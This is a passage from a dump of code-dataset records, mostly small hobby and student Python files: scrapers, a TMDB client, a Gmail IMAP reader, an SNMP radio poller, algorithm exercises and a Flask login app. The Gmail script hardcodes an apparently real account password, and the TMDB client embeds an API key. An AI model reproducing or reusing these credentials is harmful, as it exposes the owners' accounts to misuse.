(1/m)*np.sum((h-Y)*X[:,i-1])\n    # print(grads)\n    for i in range(0,n+1):\n        W[0,i] = W[0,i] - learning_rate*grads[\"dw\"+str(i)]\n    # print(W)\n    return W,j\n\n\nlearning_rate = 0.005\niterations = 120\nW_scale = 0.05\nregressaoLinear(kick1[:,:2], kick1[:,2], iterations, learning_rate, W_scale)\n# regressaoLinear(kick1[:,[1,2]], kick1[:,0])\n# regressaoLinear(kick1[:,[0,2]], kick1[:,1])","sub_path":"Projeto2/testp2.py","file_name":"testp2.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"164408880","text":"import requests\nimport os\nimport jieba.posseg as psg\n#得到的结果根据urls返回\ndef getManyPages(keyword,pages):\n    params=[]\n    for i in range(1):\n        params.append({\n            'tn': 'resultjson_com',\n            'ipn': 'rj',\n            'ct': 201326592,\n            'is': '',\n            'fp': 'result',\n            'queryWord': keyword,\n            'cl': 2,\n            'lm': -1,\n            'ie': 'utf-8',\n            'oe': 'utf-8',\n            'adpicid': '',\n            'st': -1,\n            'z': '',\n            'ic': 0,\n            'word': keyword,\n            's': '',\n            'se': '',\n            'tab': '',\n            'width': '',\n            'height': '',\n            'face': 0,\n            'istype': 2,\n            'qc': '',\n            'nc': 1,\n            'fr': '',\n            'pn': i,\n            'rn': 30,\n            'gsm': '1e',\n            '1488942260214': ''\n        })\n    #所有图片来源于下面的url,当然你也可以自己设置\n    url = 'https://image.baidu.com/search/acjson'\n    urls = []\n    for i in params:\n        urls.append(requests.get(url,params=i).json().get('data'))\n    return urls\n\n\ndef getImg(dataList, localPath,keyWord):\n\n    if not os.path.exists(localPath):  # 新建文件夹\n        os.mkdir(localPath)\n\n    x = 0\n    for list in dataList:\n        for i in list:\n            if i.get('thumbURL') != None:\n                print('正在下载:%s' % i.get('thumbURL'))\n                ir = requests.get(i.get('thumbURL'))\n                print(localPath + keyWord[0]+'.jpg')\n                open(localPath + keyWord[0]+'.jpg' , 'wb').write(ir.content)\n                x += 1\n                return\n            else:\n                print('图片链接不存在')\n\n\n\ndef reptile_img(keyWord):\n    # 关键字数组,根据数组里的关键字爬图片\n\n    dataList = getManyPages(keyWord, 1)  # 参数1:关键字,参数2:要下载的页数\n    # 本地的存储路径\n    localPath = './data/'\n    # 下载图片并存储在本地\n    getImg(dataList, localPath, keyWord)\n    # for i in range(0, len(keyWord)):\n    #     dataList = getManyPages(keyWord[i], 1)  # 参数1:关键字,参数2:要下载的页数\n    #     # 本地的存储路径\n    #     localPath = './data/'\n    #     # 下载图片并存储在本地\n    #     getImg(dataList, localPath,keyWord)\n#程序入口\n\n\ndef get_picture(keyWord,emotion):\n\n    keyWord = [keyWord]\n    # print(keyWord)\n    # print([(x.word,x.flag) for x in psg.cut(keyWord[0])])\n    keyWord = [x.word for x in psg.cut(keyWord[0]) if 'n' in x.flag]# == u'n' or x.flag == u'nr' or x.flag == u'ns']\n    if len(keyWord) == 0:\n        return -1\n    # print(keyWord[-1])\n    #\"angry\": 0, \"fear\": 1, \"happy\": 2, \"neutral\": 3, 
\"sad\": 4, \"surprise\": 5\n dict = {0:'生气的',1:'害怕的',2:'开心的',3:' ',4:'难过的',5:'惊讶的'}\n\n reptile_img([dict[emotion]+keyWord[-1]])\n # return ['./data/'+word+'jpg' for word in keyWord]\n # print('./data/'+keyWord[-1]+'.jpg')\n return './data/'+dict[emotion]+keyWord[-1]+'.jpg'\n\nif __name__ == '__main__':\n keyWord = ['右上方画一个太阳。']\n\n get_picture(keyWord)\n\n # reptile_img(keyWord)","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"329304504","text":"#!/usr/bin/env python\n\"\"\"Entertainment Center for displaying movie posters & trailers\"\"\"\n\nfrom fresh_tomatoes import open_movies_page\nimport media\n\nMOVIES = list()\nMOVIES.append(media.Movie(\n title='The Empire Strikes Back',\n trailer_youtube_url='https://www.youtube.com/watch?v=96v4XraJEPI',\n poster_image_url='https://upload.wikimedia.org/wikipedia/en/3/3c/SW_-_Empire_Strikes_Back.jpg'))\nMOVIES.append(media.Movie(\n title='Ikiru',\n trailer_youtube_url='https://www.youtube.com/watch?v=Lc4y-asVh3c',\n poster_image_url='https://upload.wikimedia.org/wikipedia/commons/thumb/3/3a/Ikiru_poster.jpg/440px-Ikiru_poster.jpg'))\nMOVIES.append(media.Movie(\n title='Bullitt',\n trailer_youtube_url='https://www.youtube.com/watch?v=BsvD806qNM8',\n poster_image_url='https://upload.wikimedia.org/wikipedia/en/1/17/Bullitt_poster.jpg'))\nMOVIES.append(media.Movie(\n title='Die Hard',\n trailer_youtube_url='https://www.youtube.com/watch?v=2TQ-pOvI6Xo',\n poster_image_url='https://upload.wikimedia.org/wikipedia/en/7/7e/Die_hard.jpg'))\nMOVIES.append(media.Movie(\n title='The Good, the Bad and the Ugly',\n trailer_youtube_url='https://www.youtube.com/watch?v=WCN5JJY_wiA',\n poster_image_url='https://upload.wikimedia.org/wikipedia/en/4/45/Good_the_bad_and_the_ugly_poster.jpg'))\nMOVIES.append(media.Movie(\n title='The Bourne Identity',\n trailer_youtube_url='https://www.youtube.com/watch?v=FpKaB5dvQ4g',\n poster_image_url='https://upload.wikimedia.org/wikipedia/en/a/ae/BourneIdentityfilm.jpg'))\n\nopen_movies_page(MOVIES)\n\n","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"223138508","text":"\"\"\"\nhttps://leetcode.com/problems/number-complement/\n\nThe complement of an integer is the integer you get when you flip all the 0's to 1's and all the 1's to 0's in its binary representation.\n\nFor example, The integer 5 is \"101\" in binary and its complement is \"010\" which is the integer 2.\nGiven an integer num, return its complement.\n\n \n\nExample 1:\n\nInput: num = 5\nOutput: 2\nExplanation: The binary representation of 5 is 101 (no leading zero bits), and its complement is 010. So you need to output 2.\nExample 2:\n\nInput: num = 1\nOutput: 0\nExplanation: The binary representation of 1 is 1 (no leading zero bits), and its complement is 0. So you need to output 0.\n \n\nConstraints:\n\n1 <= num < 2^31\n\"\"\"\n\nclass Solution:\n def findComplement(self, num: int) -> int:\n c=0\n n = num\n while num > 0:\n c = c + 1\n num = num >> 1\n \n d = 1 << c\n \n return d - 1 - n\n \n","sub_path":"Algorithm/476. Number Complement.py","file_name":"476. 
Number Complement.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"459866043","text":"import requests\nfrom requests import models\nfrom tmdb import TMDBHelper\nfrom pprint import pprint\n\n\ndef popular_count():\n \"\"\"\n popular 영화목록의 개수 출력.\n \"\"\"\n tmdb = TMDBHelper('9fdc58305c6e8e783df774eb9638b740')\n url = tmdb.get_request_url(language='ko', region='KR')\n data = requests.get(url).json()\n pprint(data['results'][0])\n return len(data['results'])\n\ndef vote_average_movies():\n \"\"\"\n popular 영화목록중 vote_average가 8 이상인 영화목록 출력.\n \"\"\"\n res=[]\n tmdb = TMDBHelper('9fdc58305c6e8e783df774eb9638b740')\n url = tmdb.get_request_url(language='ko', region='KR')\n data = requests.get(url).json()\n for i in data['results']:\n if i['vote_average']>=8:\n res.append(i['title'])\n return res\n\ndef ranking():\n \"\"\"\n popular 영화목록을 정렬하여 평점순으로 5개 출력.\n \"\"\"\n res=[]\n tmp=dict()\n tmdb = TMDBHelper('9fdc58305c6e8e783df774eb9638b740')\n url = tmdb.get_request_url(language='ko', region='KR')\n data = requests.get(url).json()\n for i in data['results']:\n tmp[i['title']]=i['vote_average']\n tmp=sorted(tmp.items(), key=lambda x:x[1], reverse=True)\n for i in range(5):\n res.append(tmp[i][0])\n\n return res\n\n\ndef recommendation(title):\n \"\"\"\n 제목에 해당하는 영화가 있으면\n 해당 영화의 id를 기반으로 추천 영화 목록을 출력.\n 추천 영화가 없을 경우 [] 출력.\n 영화 id검색에 실패할 경우 None 출력.\n \"\"\"\n res=[]\n tmdb=TMDBHelper('9fdc58305c6e8e783df774eb9638b740')\n\n movie_id = tmdb.get_movie_id(title)\n if movie_id!=None:\n url=tmdb.get_request_url(method=f'/movie/{movie_id}/recommendations',language='ko',region='KR')\n data = requests.get(url).json()\n for i in data['results']:\n res.append(i['title'])\n return res\n else:\n return None\n\ndef credits(title):\n \"\"\"\n 제목에 해당하는 영화가 있으면\n 해당 영화 id를 통해 영화 상세정보를 검색하여\n 주연배우 목록과 목록을 출력.\n 영화 id검색에 실패할 경우 None 출력.\n \"\"\"\n cast=[]\n crew=[]\n tmdb=TMDBHelper('9fdc58305c6e8e783df774eb9638b740')\n\n movie_id = tmdb.get_movie_id(title)\n if movie_id!=None:\n url=tmdb.get_request_url(method=f'/movie/{movie_id}/credits',language='ko',region='KR')\n data = requests.get(url).json()\n for i in data['cast']:\n if i['cast_id']<10:\n cast.append(i['original_name'])\n\n for i in data['crew']:\n if i['department']=='Directing':\n crew.append(i['original_name'])\n print(cast,crew)\n res={'cast':cast, 'crew':crew}\n return res\n\nif __name__ == '__main__':\n print(popular_count())\n\n pprint(vote_average_movies())\n\n pprint(ranking())\n\n pprint(recommendation('기생충'))\n pprint(recommendation('그래비티'))\n pprint(recommendation('검색할 수 없는 영화'))\n\n pprint(credits('기생충'))\n pprint(credits('검색할 수 없는 영화'))","sub_path":"Project_Toy2.py","file_name":"Project_Toy2.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"299711321","text":"import imaplib\nimport re\nimport email\n\n\ndef read_email_from_gmail():\n try:\n mail = imaplib.IMAP4_SSL(SMTP_SERVER)\n mail.login(FROM_EMAIL, FROM_PWD)\n mail.select('inbox')\n type, data = mail.search(None, 'All')\n for num in data[0].split():\n type, data = mail.fetch(num, '(RFC822)')\n raw_text = (data[0][1])\n msg = email.message_from_string(raw_text.decode('utf-8'))\n print('From: %s' % msg['from'])\n print('To: %s' % (re.search(r'[\\w\\.-]+@[\\w\\.-]+', msg['to'])).group(0))\n print('Subject: %s' % msg['subject'])\n print('Date: %s' % msg['date'])\n for part in msg.walk():\n if 
part.get_content_type() == 'text/plain':\n print('body: \\n %s ' % part.get_payload(decode=True).decode('utf-8'))\n print('***********************************************************************')\n mail.close()\n mail.logout()\n\n except Exception as e:\n print(str(e))\n\n\nif __name__ == '__main__':\n ORG_EMAIL = \"@gmail.com\"\n FROM_EMAIL = \"qermezkon\" + ORG_EMAIL\n FROM_PWD = \"Mveyma6303$Kabinet95\"\n SMTP_SERVER = \"imap.gmail.com\"\n SMTP_PORT = 993\n\n read_email_from_gmail()\n","sub_path":"readGmailMessages.py","file_name":"readGmailMessages.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"543217819","text":"#!/usr/bin/env python3\n\nimport sys\nimport os\nimport numpy\nimport math\n\n# libraries for the performance plot\nimport matplotlib.pyplot as plt\nfrom timeit import timeit\n\ndef main():\n filepath = sys.argv[1]\n\n if not os.path.isfile(filepath):\n print(\"File path {} does not exist. Exiting...\".format(filepath))\n sys.exit()\n\n f = open(filepath, \"r\")\n\n values = f.readlines()\n\n for i in range(0, len(values)):\n values[i] = values[i].replace(',', '.')\n values[i] = float(values[i])\n# print(values[i])\n\n print_plot(values)\n\ndef order_bag_of_words(bag_of_words, desc=False):\n words = [(word, cnt) for word, cnt in bag_of_words.items()]\n return sorted(words, key=lambda x: x[1], reverse=desc)\n\ndef record_word_cnt(words, bag_of_words):\n for word in words:\n if word != '':\n if word.lower() in bag_of_words:\n bag_of_words[word.lower()] += 1\n else:\n bag_of_words[word.lower()] = 1\n\n\n\ndef print_plot(values):\n \"\"\"\n print plot\n \"\"\"\n points_num = []\n atan_values = []\n diff_values = []\n length = len(values)\n for index, i in enumerate(numpy.arange(-1000.14, 1000.14, 2.5)):\n points_num.append(i)\n atan_values.append(math.atan(i))\n diff_values.append(values[index] - atan_values[index])\n# print(\"test\", diff_values[index])\n atan_values[index] = round(atan_values[index], 5)\n\n plt.plot(points_num, values, color='blue', label=\"Notre atan\")\n plt.plot(points_num, atan_values, color='orange', label=\"Le vrai atan\")\n# plt.plot(points_num, diff_values, color='green', label=\"La différence\")\n plt.legend(bbox_to_anchor=(0.03, 0.95), loc=2, borderaxespad=0.)\n plt.ylabel('y')\n plt.xlabel('x')\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"docs/soutenance/extension/drawDiagrams_atan.py","file_name":"drawDiagrams_atan.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"410799496","text":"#!/usr/bin/python3\n\n\"\"\"This module defines several base classes that are common for\nthe dev-pipeline utility\"\"\"\n\nimport argparse\nimport errno\nimport os\nimport re\nimport sys\n\nimport devpipeline.config.config\nimport devpipeline.executor\nimport devpipeline.resolve\nimport devpipeline.version\n\n\nclass GenericTool(object):\n\n \"\"\"This is the base class for tools that can be used by dev-pipeline.\n\n In subclasses, override the following as needed:\n execute()\n setup()\"\"\"\n\n def __init__(self, *args, **kwargs):\n self.parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n *args, **kwargs)\n self.parser.add_argument(\"--version\", action=\"version\",\n version=\"%(prog)s {}\".format(\n devpipeline.version.STRING))\n\n def add_argument(self, *args, **kwargs):\n \"\"\"Subclasses inject 
additional cli arguments to parse by calling this function\"\"\"\n self.parser.add_argument(*args, **kwargs)\n\n def execute(self, *args, **kwargs):\n \"\"\"Initializes and runs the tool\"\"\"\n args = self.parser.parse_args(*args, **kwargs)\n self.setup(args)\n self.process()\n\n def setup(self, arguments):\n \"\"\"Subclasses should override this function to perform any pre-execution setup\"\"\"\n pass\n\n def process(self):\n \"\"\"Subclasses should override this function to do the work of executing the tool\"\"\"\n pass\n\n\ndef _set_env(env, key, value):\n real_key = key.upper()\n if value:\n env[real_key] = value\n else:\n del env[real_key]\n\n\ndef _append_env(env, key, value):\n real_key = key.upper()\n if real_key in env:\n env[real_key] += \"{}{}\".format(os.pathsep, value)\n else:\n env[real_key] = value\n\n\n_ENV_SUFFIXES = {\n None: _set_env,\n \"append\": _append_env\n}\n\n\ndef create_target_environment(target):\n ret = os.environ.copy()\n pattern = re.compile(R\"^env(?:_(\\w+))?\\.(\\w+)\")\n for key, value in target.items():\n matches = pattern.match(key)\n if matches:\n helper_fn = _ENV_SUFFIXES.get(matches.group(1))\n if helper_fn:\n helper_fn(ret, matches.group(2), value)\n return ret\n\n\nclass TargetTool(GenericTool):\n\n \"\"\"A devpipeline tool that executes a list of tasks against a list of targets\"\"\"\n\n def __init__(self, tasks=None, executors=True, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.add_argument(\"targets\", nargs=\"*\",\n help=\"The targets to operate on\")\n self.tasks = tasks\n if executors:\n self.add_argument(\"--executor\",\n help=\"The amount of verbosity to use. Options \"\n \"are \\\"quiet\\\" (print no extra \"\n \"information), \\\"verbose\\\" (print \"\n \"additional information), \\\"dry-run\\\" \"\n \"(print commands to execute, but don't run\"\n \" them), and \\\"silent\\\" (print nothing). \"\n \"Regardless of this option, errors are \"\n \"always printed.\",\n default=\"quiet\")\n self.verbosity = True\n self.executor = None\n self.components = None\n self.targets = None\n else:\n self.verbosity = False\n\n def execute(self, *args, **kwargs):\n parsed_args = self.parser.parse_args(*args, **kwargs)\n\n self.components = devpipeline.config.config.update_cache()\n if parsed_args.targets:\n self.targets = parsed_args.targets\n else:\n self.targets = self.components.sections()\n self.setup(parsed_args)\n if self.verbosity:\n helper_fn = devpipeline.EXECUTOR_TYPES.get(parsed_args.executor)\n if not helper_fn:\n raise Exception(\n \"{} isn't a valid executor\".format(parsed_args.executor))\n else:\n self.executor = helper_fn()\n self.process()\n\n def process(self):\n build_order = devpipeline.resolve.order_dependencies(\n self.targets, self.components)\n self.process_targets(build_order)\n\n def process_targets(self, build_order):\n \"\"\"Calls the tasks with the appropriate options for each of the targets\"\"\"\n config_info = {\n \"executor\": self.executor\n }\n for target in build_order:\n self.executor.message(\" {}\".format(target))\n self.executor.message(\"-\" * (4 + len(target)))\n current = self.components[target]\n env = create_target_environment(current)\n\n config_info[\"current_target\"] = target\n config_info[\"current_config\"] = current\n config_info[\"env\"] = env\n for task in self.tasks:\n task(config_info)\n self.executor.message(\"\")\n\n\ndef execute_tool(tool, args):\n \"\"\"Runs the provided tool with the given args. 
Exceptions are propagated to the caller\"\"\"\n if args is None:\n args = sys.argv[1:]\n try:\n tool.execute(args)\n\n except IOError as failure:\n if failure.errno == errno.EPIPE:\n # This probably means we were piped into something that terminated\n # (e.g., head). Might be a better way to handle this, but for now\n # silently swallowing the error isn't terrible.\n pass\n\n except Exception as failure:\n print("Error: {}".format(str(failure)), file=sys.stderr)\n raise\n","sub_path":"lib/devpipeline/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"413280309","text":"from .profile import Profile\nfrom .group import Group\nfrom .post import Post\n\n\nclass NewsFeed:\n def __init__(self, api_response):\n self.profiles = list(\n map(lambda profile: Profile(profile), api_response['profiles']))\n self.groups = list(\n map(lambda group: Group(group), api_response['groups']))\n if 'next_from' in api_response:\n self.next_from = api_response['next_from']\n else:\n self.next_from = None\n self.items = list(map(lambda item: Post(\n item, self.groups, self.profiles), api_response['items']))\n self.items.reverse()\n","sub_path":"bot/vk/types/newsfeed.py","file_name":"newsfeed.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"583775170","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n# Complete the evenForest function below.\ndef evenForest(n, m, t_from, t_to):\n g = {i: [] for i in range(1, n + 1)}\n for i in range(m):\n g[t_from[i]].append(t_to[i])\n g[t_to[i]].append(t_from[i])\n\n visited = [False] * (n + 1)\n count = [0]\n\n def dfs(u):\n ans = 1\n visited[u] = True\n for v in g[u]:\n if not visited[v]:\n ans += dfs(v)\n if ans % 2 == 0:\n count[0] += 1\n ans = 0\n return ans\n\n dfs(1)\n return count[0] - 1\n\n\nif __name__ == '__main__':\n\n t_nodes, t_edges = map(int, input().rstrip().split())\n\n t_from = [0] * t_edges\n t_to = [0] * t_edges\n\n for i in range(t_edges):\n t_from[i], t_to[i] = map(int, input().rstrip().split())\n\n res = evenForest(t_nodes, t_edges, t_from, t_to)\n\n print(str(res) + '\\n')\n","sub_path":"hackerank/2022/advance/even-tree.py","file_name":"even-tree.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"539880835","text":"#!/usr/bin/env python2\nimport pygraphviz as pgv\nfrom sets import Set\nimport sys\n\ndef label (i):\n try:\n return i.attr['label']\n except AttributeError:\n return None\n\ndef same_label (n0, n1):\n return label(n0) == label(n1) and label(n0) != None\n\ndef terminate (code):\n sys.exit(code)\n\ndef root (graph):\n for i in graph.iternodes():\n if label(i) == \"programa\":\n return i\n\nif len(sys.argv) < 3:\n print('usage: %s DOTFILE DOTFILE'%(sys.argv[0]))\n terminate (1)\nref, target = sys.argv[1:3]\nif '-' == ref:\n\tref = '/dev/stdin'\nif '-' == target:\n\ttarget = '/dev/stdin'\nref = pgv.AGraph (str(ref))\ntarget = pgv.AGraph (str(target))\n\n#1. find the root node of ref and target\nref_root = root(ref)\ntarget_root = root(target)\n\ndef compare_tree (r_tree, r_root, t_tree, t_root):\n if not same_label (r_root, t_root):\n return False\n\n if not len(r_tree.out_neighbors(r_root)) == len(t_tree.out_neighbors(t_root)):\n return False\n\n t_neigh = t_tree.out_neighbors(t_root)[:]\n for i in r_tree.out_neighbors(r_root):\n for j in range(len(t_neigh)):\n if compare_tree (r_tree, i, t_tree, t_neigh[j]) is True:\n t_neigh.pop(j)\n break\n else:\n return False\n\n return [] == t_neigh\n\nif compare_tree (ref, ref_root, target, target_root) is False:\n terminate (1)\nelse:\n terminate (0)\n","sub_path":"tests/e3/checkdots.py","file_name":"checkdots.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"62842767","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url, include\n\nfrom rest_framework_extensions.routers import ExtendedSimpleRouter\nfrom rest_framework_swagger.views import get_swagger_view\n\nfrom suppliers.views import (\n BaseSupplierViewSet, BaseRepresentationOrderViewSet)\n\n\nrouter = ExtendedSimpleRouter(trailing_slash=False)\n(\n router.register(r'suppliers', BaseSupplierViewSet, base_name='suppliers')\n .register(r'reporders',\n BaseRepresentationOrderViewSet,\n base_name='suppliers-reporders',\n parents_query_lookups=['supplier__code'])\n)\n\nschema_view = get_swagger_view(\n title='Claim for crown court defence Supplier API - v1')\n\nurlpatterns = (\n url(r'^', include(router.urls)),\n url(r'^docs$', schema_view)\n)\n","sub_path":"supplier_api/apps/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"513402982","text":"\"\"\" \nstep02_konlpy.py\n\nKonlpy : 한글 형태소 분석을 제공하는 패키지\n\"\"\"\nimport konlpy\nfrom konlpy.tag import Kkma\n\nkkma = Kkma() # 생성자 -> object 생성\n\n# 문단 -> 문장\npara = \"나는 홍길동 입니다. 나이는 23세 입니다. 
대한민국 만세 입니다.\"\nex_sent = kkma.sentences(para)\nex_sent # list\n# ['나는 홍길동 입니다.', '나이는 23세 입니다.', '대한민국 만세 입니다.']\nlen(ex_sent)\n\n# 문장 -> 단어(명사)\nex_nouns = kkma.nouns(para)\nex_nouns\n# ['나', '홍길동', '나이', '23', '23세', '세', '대한', '대한민국', '민국', '만세']\n\n# 문단 -> 품사(형태서)\nex_pos = kkma.pos(para)\nex_pos\ntype(ex_pos) # list [ (word, 품사)]\n\n# NNG 일반 명사 NNP 고유명사 NP 대명사\nnouns = []\nfor word, wclass in ex_pos:\n if wclass == \"NNG\" or wclass == \"NNP\" or wclass == \"NP\":\n nouns.append(word)\n\nnouns","sub_path":"chap07_TextMining/lecture02_NLP/step02_konlpy.py","file_name":"step02_konlpy.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"613414862","text":"\r\n\r\n# if wrong boards size - -1\r\n# the same - 0\r\n# not the same - c (1<=c<=9) (number of diffs) and positions\r\ndef diff(board1, board2):\r\n if len(board1) != len(board2):\r\n return -1, []\r\n\r\n diffs = []\r\n for i in range(len(board1)):\r\n if len(board1[i]) != len(board2[i]):\r\n return -1, []\r\n for j in range(len(board1[i])):\r\n if board1[i][j] != board2[i][j]:\r\n diffs.append((i,j))\r\n\r\n return len(diffs), diffs\r\n\r\n","sub_path":"utils/tic_tac_toe_utils.py","file_name":"tic_tac_toe_utils.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"304972517","text":"import json\nfrom pysnmp.hlapi import *\nfrom pandas import DataFrame\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\n\nfrom . import database as db\nfrom .database.common import qI, commit, commit_log\n\n\n_SN = '1.1'\n_LOC = '6'\n_NAME = '5'\n_MODEL = '1.2'\n_FREQ_TX = '2.18'\n_FREQ_RX = '2.19'\n_ISO_OID = '.1.3.6.1.2.1.1.'\n_TRIO_OID = '.1.3.6.1.4.1.33302.30.'\n\n\ndef loadCommunities(filename='./macros.json'):\n '''Load communities to SNMP.'''\n with open(filename, 'r') as f:\n text = json.load(f)\n\n macros = text['snmp_c']\n commun = [f['value'] for f in macros]\n return commun\n\n\ndef cSy(state):\n if state:\n return '(✓)'\n else:\n return '(✘)'\n\n\ndef walk(host, oid, c='cr', breakCount=None, timeout=5, retries=0):\n\n ct, outList = 0, []\n\n for (eInd, eSts, eIdx, vBinds) in nextCmd(\n SnmpEngine(), \n CommunityData(c),\n UdpTransportTarget((host, 161), timeout, retries),\n ContextData(),\n ObjectType(ObjectIdentity(oid))\n ):\n\n if eInd or eSts:\n # print('x', end='') \n break\n\n else:\n for vBind in vBinds:\n outList.extend([\n ' = '.join([x.prettyPrint() for x in vBind])\n ])\n # print('.', end='')\n\n ct += 1\n if breakCount is not None:\n if ct >= breakCount: break\n\n return outList\n\n\ndef getFirmware(host, c='cr'):\n try:\n a = walk(host, _TRIO_OID + _SN, c, 1)\n b = walk(host, _ISO_OID, c, 1)\n\n if (len(a) > 0) and (len(b) > 0):\n return dict(\n sn = a[0].split(' = ')[1],\n firmware = b[0].split(' version ')[1],\n )\n\n except:\n return None\n\n\ndef collectFirmwares():\n hosts = db.lists.hosts()\n firms = [getFirmware(host) for host in hosts]\n df = DataFrame.from_dict(list(filter(None, firms)))\n return df\n\n\ndef commitCollection(df, filename='./db.json'):\n for i in df.index:\n\n # Get data\n r = df.iloc[i]\n\n # Query to update firmware\n query = (\n \"UPDATE radio_master \"\n f\"SET firmware={qI(r.firmware)} \"\n f\"WHERE sn={r.sn}\"\n )\n\n # Load database configuration file\n corr_db, _, _ = load_databases(filename)\n\n # Connect to `correlacional` database\n engine_corr = connect2db(corr_db)\n\n try:\n 
commit(engine_corr, query)\n \n except:\n return False\n\n return True\n\n\ndef getTrioSnmp(host, c=None, timeout=5, retries=0):\n '''Collect info from Radios Trio Q.'''\n\n c = loadCommunities() if c is None else [c] if isinstance(c, str) else c\n\n for ci in c:\n try:\n # Get Host Name\n host_name = walk(host, _ISO_OID + _NAME, ci, 1, timeout, retries)[0].split(' = ')[1]\n\n # Get Host Location\n host_loc = walk(host, _ISO_OID + _LOC, ci, 1, timeout, retries)[0].split(' = ')[1]\n\n # Get Serial Number\n sn = int(walk(host, _TRIO_OID + _SN, ci, 1, timeout, retries)[0].split(' = ')[1])\n\n # Get Radio Model\n model = walk(host, _TRIO_OID + _MODEL, ci, 1, timeout, retries)[0].split(' = ')[1]\n\n # Get Radio Freq Tx\n tx = walk(host, _TRIO_OID + _FREQ_TX, ci, 1, timeout, retries)[0].split(' = ')[1]\n tx = float(tx[:3] + '.' + tx[3:])\n\n # Get Radio Freq Rx\n rx = walk(host, _TRIO_OID + _FREQ_RX, ci, 1, timeout, retries)[0].split(' = ')[1]\n rx = float(rx[:3] + '.' + rx[3:])\n\n # Get Radio Firmware\n firm = walk(host, _ISO_OID, ci, 1, timeout, retries)[0].split(' version ')[1]\n\n # Returns collect data\n return host_name, host_loc, sn, model, tx, rx, firm\n \n except: pass\n \n\ndef check(host, sn, model, tx, rx, firm):\n\n if model not in ['QR450', 'QB450']:\n return (None, None, None)\n\n # Collect SNMP data\n snmp_data = getTrioSnmp(host)\n\n # Failed to collect data\n if snmp_data is None:\n return True, 'warning', (\n 'Falha na tentativa de buscar informações via SNMP.'\n )\n\n # Unpack data\n host_name, host_loc, sn2, model2, tx2, rx2, firm2 = snmp_data\n\n # Return success\n if (sn==sn2) and (tx==tx2) and (rx==rx2) and (firm==firm2) and (model==model2):\n return True, 'success', dbc.Row([\n dbc.Col([\n html.P(f'Hostname: {host_name}'),\n html.P(f'Local: {host_loc}'),\n html.P(f'SN: {sn2} {cSy(sn==sn2)}'),\n ], xs=12, sm=12, md=6, lg=4, xl=4),\n\n dbc.Col([\n html.P(f'Freq. Tx: {tx2} {cSy(tx==tx2)}'),\n html.P(f'Freq. Rx: {rx2} {cSy(rx==rx2)}'),\n html.P(f'Firmware: {firm2} {cSy(firm==firm2)}'),\n ], xs=12, sm=12, md=6, lg=4, xl=4),\n ])\n \n # Return danger state\n else:\n return True, 'danger', dbc.Row([\n dbc.Col([\n html.P(f'Hostname: {host_name}'),\n html.P(f'Local: {host_loc}'),\n html.P(f'SN: {sn2} {cSy(sn==sn2)}'),\n ], xs=12, sm=12, md=6, lg=4, xl=4),\n\n dbc.Col([\n html.P(f'Freq. Tx: {tx2} {cSy(tx==tx2)}'),\n html.P(f'Freq. 
Rx: {rx2} {cSy(rx==rx2)}'),\n html.P(f'Firmware: {firm2} {cSy(firm==firm2)}'),\n ], xs=12, sm=12, md=6, lg=4, xl=4),\n ])\n\n","sub_path":"app/snmp.py","file_name":"snmp.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"356207055","text":"from enum import unique\nfrom flask import Flask, render_template,url_for,request,flash,redirect, session, jsonify\nfrom webapp import app, db, bcrypt\nfrom webapp.forms import RegistrationForm,LoginForm,RegisterForm,FuelQuoteForm\nfrom flask_login import login_user, current_user, logout_user\nfrom webapp.models import User, Registered_user, Fuel_quote\n\nuserid = 0\n\n\n\n@app.route('/login')\n@app.route('/', methods=[\"GET\", \"POST\"])\ndef home():\n #if request.method == \"POST\":\n #user = request.form.get(\"username\")\n #return user\n form = LoginForm() #delete META after testing!!!\n if current_user.is_authenticated:\n return redirect(url_for('Management'))\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data).first()\n\n if user and bcrypt.check_password_hash(user.password, form.password.data):\n global userid\n userid=user.id\n login_user(user) #remember=form.remember.data\n flash('You have been logged in!', 'success')\n return redirect(url_for('Management'))\n else:\n flash(\"Login 